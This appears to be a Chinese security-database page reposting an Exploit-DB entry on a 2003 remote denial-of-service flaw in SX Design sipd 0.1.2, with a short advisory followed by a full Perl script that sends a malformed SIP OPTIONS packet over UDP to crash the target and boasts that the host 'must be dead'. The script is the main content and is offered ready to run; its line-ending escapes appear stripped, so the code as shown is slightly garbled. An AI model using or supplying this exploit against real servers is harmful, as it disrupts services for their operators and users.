SX Design sipd 0.1.2 – Remote Denial of Service

SX Design sipd 0.1.2 – Remote Denial of Service

漏洞ID 1054293 漏洞类型
发布时间 2003-12-11 更新时间 2003-12-11
图片[1]-SX Design sipd 0.1.2 – Remote Denial of Service-安全小百科CVE编号 N/A
图片[2]-SX Design sipd 0.1.2 – Remote Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23431
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9198/info

It has been reported that sipd may be prone to a vulnerability that may allow a remote attacker to cause a denial of service condition in the software. The problem is reported to exist in the gethostbyname_r function. An attacker may be able to cause the server to crash by sending a malformed SIP request.

sipd version 0.1.2 has been reported to be prone to this issue, however other versions could be affected as well. 

#!/usr/bin/perl

# SIPd - SIP URI Denial of Service
# Kills sipd version 0.1.2

use IO::Socket;
use strict;

unless (@ARGV == 2) { die "usage: $0 host your_ip [port]" }

my $remote_host = shift(@ARGV);
my $your_host = shift(@ARGV);
my $port = shift(@ARGV);
if ($port eq "")
{
 $port = "5060";
}

my $buf = "OPTIONS sip:A$remote_host SIP/2.0r
Via: SIP/2.0/UDP $your_host:3277r
From: <sip:$your_host:3277>r
To: <sip:$your_host:3277>r
Call-ID: 12312312@$your_hostr
CSeq: 1 OPTIONSr
Max-Forwards: 70r
rn";

my $socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error: 
$@n"; my $ipaddr = inet_aton($remote_host) || $remote_host; my $portaddr 
= sockaddr_in($port, $ipaddr);

send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send: 
$!n";

print "Now, '$remote_host' must be dead :)n";

相关推荐: vBulletin private.php跨站脚本攻击漏洞

vBulletin private.php跨站脚本攻击漏洞 漏洞ID 1107326 漏洞类型 跨站脚本 发布时间 2003-05-14 更新时间 2003-06-16 CVE编号 CVE-2003-0295 CNNVD-ID CNNVD-200306-086…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享